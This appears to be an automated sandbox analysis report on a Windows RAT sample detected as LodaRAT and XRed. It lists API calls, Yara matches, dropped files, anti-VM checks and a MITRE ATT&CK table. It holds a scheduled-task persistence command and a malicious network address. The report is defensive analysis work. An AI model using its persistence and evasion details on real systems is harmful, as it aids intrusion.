                            Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7028Thread sleep count: 65 > 30
                            Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7028Thread sleep time: -3900000s >= -30000s
                            Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7424Thread sleep time: -60000s >= -30000s
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\ProgramData\Synaptics\Synaptics.exeLast function: Thread delayed
                            Source: C:\ProgramData\Synaptics\Synaptics.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeThread sleep count: Count: 4763 delay: -10Jump to behavior
                            Source: Yara matchFile source: 00000009.00000002.2950835598.0000000003018000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.2971041978.00000000048C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.2954705649.0000000003280000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: ._cache_Google.exe PID: 2836, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 4076, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, type: DROPPED
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0091DD92 GetFileAttributesW,FindFirstFileW,FindClose,2_2_0091DD92
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_00952044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00952044
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0095219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0095219F
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_009524A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_009524A9
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_00946B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_00946B3F
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_00946E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_00946E4A
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0094F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0094F350
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0094FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0094FDD2
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0094FD47 FindFirstFileW,FindClose,2_2_0094FD47
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008F2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_008F2044
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008F219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_008F219F
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008F24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_008F24A9
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008E6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,11_2_008E6B3F
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008E6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,11_2_008E6E4A
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008EF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_008EF350
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008BDD92 GetFileAttributesW,FindFirstFileW,FindClose,11_2_008BDD92
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008EFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_008EFDD2
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008EFD47 FindFirstFileW,FindClose,11_2_008EFD47
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_00292044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,27_2_00292044
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0029219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,27_2_0029219F
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_002924A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,27_2_002924A9
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_00286B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,27_2_00286B3F
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_00286E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,27_2_00286E4A
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0028F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,27_2_0028F350
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0028FD47 FindFirstFileW,FindClose,27_2_0028FD47
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0025DD92 GetFileAttributesW,FindFirstFileW,FindClose,27_2_0025DD92
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0028FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,27_2_0028FDD2
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0091E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_0091E47B
                            Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000
                            Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                            Source: Google.exe, 00000001.00000002.1744327475.000000000083A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91ef
                            Source: wscript.exe, 00000000.00000003.1727135319.00000231A0452000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1725904864.000002319DD13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1727945745.000002319DD38000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1725962280.000002319DD33000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1728737665.00000231A0452000.00000004.00000020.00020000.00000000.sdmp, ._cache_Google.exe, 00000002.00000002.2949109717.00000000013EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2039578728.000000000074E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2039578728.0000000000719000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2953691114.000000000089F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2953691114.0000000000918000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: Google.exe, 00000001.00000003.1743489161.000000000082C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                            Source: wscript.exe, 00000000.00000003.1725904864.000002319DD13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1727945745.000002319DD38000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1725962280.000002319DD33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW'
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000074E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
                            Source: ._cache_Google.exe, 00000002.00000002.2951727343.000000000143B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeAPI call chain: ExitProcess graph end nodegraph_2-110081
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeAPI call chain: ExitProcess graph end nodegraph_2-107545
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0095703C BlockInput,2_2_0095703C
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0090374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,2_2_0090374E
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_009346D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,2_2_009346D0
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_009620F6 LoadLibraryA,GetProcAddress,2_2_009620F6
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0092A937 GetProcessHeap,2_2_0092A937
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_00928E19 SetUnhandledExceptionFilter,2_2_00928E19
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_00928E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00928E3C
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008C8E19 SetUnhandledExceptionFilter,11_2_008C8E19
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008C8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_008C8E3C
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_00268E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_00268E3C
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_00268E19 SetUnhandledExceptionFilter,27_2_00268E19

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Benign windows process drops PE files
                            Source: C:\Windows\System32\wscript.exeFile created: Products-Pdf[1].exe.0.drJump to dropped file
                            System process connects to network (likely due to code injection or exploit)
                            Source: C:\Windows\System32\wscript.exeNetwork Connect: 23.109.93.100 443Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0093BE95 LogonUserW,2_2_0093BE95
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0090374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,2_2_0090374E
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_00944B52 SendInput,keybd_event,2_2_00944B52
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_00947DD5 mouse_event,2_2_00947DD5
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeProcess created: C:\Users\user\AppData\Local\Temp\._cache_Google.exe "C:\Users\user\AppData\Local\Temp\._cache_Google.exe" Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe"
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0093B398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,2_2_0093B398
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0093BE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,2_2_0093BE31
                            Source: ._cache_Google.exe, 00000002.00000002.2970793903.000000000486D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerh
                            Source: ._cache_Google.exeBinary or memory string: Shell_TrayWnd
                            Source: wscript.exe, 00000000.00000003.1724553873.00000231A0B58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1724608762.00000231A0B58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1724803015.00000231A0B58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: udeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                            Source: ._cache_Google.exe, 00000002.00000002.2970793903.000000000486D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager5
                            Source: wscript.exe, 00000000.00000003.1723583214.00000231A0987000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1724922791.00000231A067E000.00000004.00000020.00020000.00000000.sdmp, Google.exe, 00000001.00000000.1725560700.0000000000566000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_00927254 cpuid 2_2_00927254
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_009240DA GetSystemTimeAsFileTime,__aulldiv,2_2_009240DA
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0097C146 GetUserNameW,2_2_0097C146
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_00932C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_00932C3C
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0091E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_0091E47B
                            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: ._cache_Google.exe, 00000002.00000002.2949109717.00000000013EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected LodaRAT
                            Source: Yara matchFile source: Process Memory Space: ._cache_Google.exe PID: 2836, type: MEMORYSTR
                            Yara detected XRed
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Source: Yara matchFile source: 1.0.Google.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000003.1724371343.00000231A0A93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1726551939.00000231A0520000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000001.00000000.1725463339.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1723583214.00000231A0826000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7132, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Google.exe PID: 1148, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXC360.tmp, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX915F.tmp, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Products-Pdf[1].exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe, type: DROPPED
                            Source: TXAASJ.exe, 00000021.00000002.2449488616.00000000047D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81c
                            Source: TXAASJ.exe, 00000021.00000002.2446488572.000000000094E000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
                            Source: ._cache_Google.exe, 00000020.00000003.2391833824.0000000004AB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81
                            Source: ._cache_Google.exeBinary or memory string: WIN_XP
                            Source: TXAASJ.exe, 0000000B.00000002.1839495768.0000000003FD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81'
                            Source: ._cache_Google.exeBinary or memory string: WIN_XPe
                            Source: ._cache_Google.exeBinary or memory string: WIN_VISTA
                            Source: TXAASJ.exe, 00000019.00000003.2176146410.00000000046BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_811
                            Source: ._cache_Google.exe, 00000002.00000002.2949109717.00000000013D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 29844742x|user|WIN_81|X64| |Windows Defender|
                            Source: ._cache_Google.exeBinary or memory string: WIN_7
                            Source: ._cache_Google.exe, 00000002.00000002.2970691387.0000000004836000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|gesgnd|x|user|WIN_81|X64| |Windows Defender|192.168.2.4|ddd|Pr1024X21280X3|Desktop|0|beta10_none_a8625c1886757984\
                            Source: ._cache_Google.exeBinary or memory string: WIN_8
                            Source: ._cache_Google.exe, 00000002.00000002.2970919562.00000000048A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_818
                            Source: Yara matchFile source: Process Memory Space: ._cache_Google.exe PID: 2836, type: MEMORYSTR

                            Remote Access Functionality

                            barindex
                            Yara detected LodaRAT
                            Source: Yara matchFile source: Process Memory Space: ._cache_Google.exe PID: 2836, type: MEMORYSTR
                            Yara detected XRed
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Source: Yara matchFile source: 1.0.Google.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000003.1724371343.00000231A0A93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1726551939.00000231A0520000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000001.00000000.1725463339.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1723583214.00000231A0826000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7132, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Google.exe PID: 1148, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXC360.tmp, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX915F.tmp, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Products-Pdf[1].exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe, type: DROPPED
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_009591DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_009591DC
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_009596E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_009596E2
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008F91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,11_2_008F91DC
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008F96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_008F96E2
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_002991DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,27_2_002991DC
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_002996E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,27_2_002996E2

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information631
                            Scripting                            		2
                            Valid Accounts                            		11
                            Windows Management Instrumentation                            		631
                            Scripting                            		1
                            Exploitation for Privilege Escalation                            		1
                            Disable or Modify Tools                            		21
                            Input Capture                            		2
                            System Time Discovery                            		Remote Services1
                            Archive Collected Data                            		4
                            Ingress Tool Transfer                            		Exfiltration Over Other Network Medium1
                            System Shutdown/Reboot
                            CredentialsDomains1
                            Replication Through Removable Media                            		2
                            Native API                            		1
                            DLL Side-Loading                            		1
                            DLL Side-Loading                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory1
                            Peripheral Device Discovery                            		Remote Desktop Protocol21
                            Input Capture                            		11
                            Encrypted Channel                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts1
                            Exploitation for Client Execution                            		2
                            Valid Accounts                            		1
                            Extra Window Memory Injection                            		3
                            Obfuscated Files or Information                            		Security Account Manager1
                            Account Discovery                            		SMB/Windows Admin Shares3
                            Clipboard Data                            		3
                            Non-Application Layer Protocol                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal Accounts1
                            Scheduled Task/Job                            		1
                            Scheduled Task/Job                            		2
                            Valid Accounts                            		1
                            DLL Side-Loading                            		NTDS4
                            File and Directory Discovery                            		Distributed Component Object ModelInput Capture314
                            Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchd221
                            Registry Run Keys / Startup Folder                            		21
                            Access Token Manipulation                            		1
                            Extra Window Memory Injection                            		LSA Secrets28
                            System Information Discovery                            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts112
                            Process Injection                            		12
                            Masquerading                            		Cached Domain Credentials1
                            Query Registry                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                            Scheduled Task/Job                            		2
                            Valid Accounts                            		DCSync261
